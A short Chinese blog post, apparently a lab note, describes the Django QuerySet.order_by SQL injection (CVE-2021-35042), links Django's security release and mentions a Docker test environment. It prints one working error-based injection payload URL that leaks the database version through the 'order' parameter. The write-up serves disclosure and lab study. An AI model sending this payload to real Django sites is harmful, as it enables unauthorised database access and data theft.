本文主要是介绍Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
- Django security releases issued: 3.2.5 and 3.1.13 | Weblog | Django
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
这篇关于Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!